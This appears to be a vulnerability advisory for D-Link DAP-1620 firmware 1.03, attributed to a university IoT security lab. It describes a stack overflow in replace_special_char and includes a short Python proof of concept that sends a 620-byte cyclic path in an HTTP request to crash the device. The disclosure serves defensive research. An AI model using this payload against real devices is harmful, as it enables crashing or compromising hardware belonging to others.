Overview

Firmware Name Firmware Version Download Link
DAP-1620 DAP_1620_REVA_FIRMWARE_1.03 https://legacyfiles.us.dlink.com/DAP-1620/REVA/Firmware/DAP-1620_REVA_FIRMWARE_1.03.B08.ZIP

Vulnerability details

1. Vulnerability Trigger Location

This vulnerability is triggered due to a stack overflow in the replace_special_char function, causing the function to return to an abnormal address.

image.png

2. Vulnerability Analysis

This chain of events highlights how the vulnerability can be exploited by crafting a malicious HTTP request with a long URL-encoded path, especially one that decodes to a string exceeding 600 bytes after processing.

POC

python script

import requests
from pwn import *
ip = "172.17.0.3"
port = 80
url = f"http://{ip}:{port}/storage/{cyclic(620).decode('utf-8')}?"
print(requests.get(url).text)

Vulnerability Verification Screenshot

image.png

Discoverer

The vulnerability was discovered by Professor Wei Zhou's team (IoTS&P Lab) from the School of Cyber Science and Engineering at Huazhong University of Science and Technology.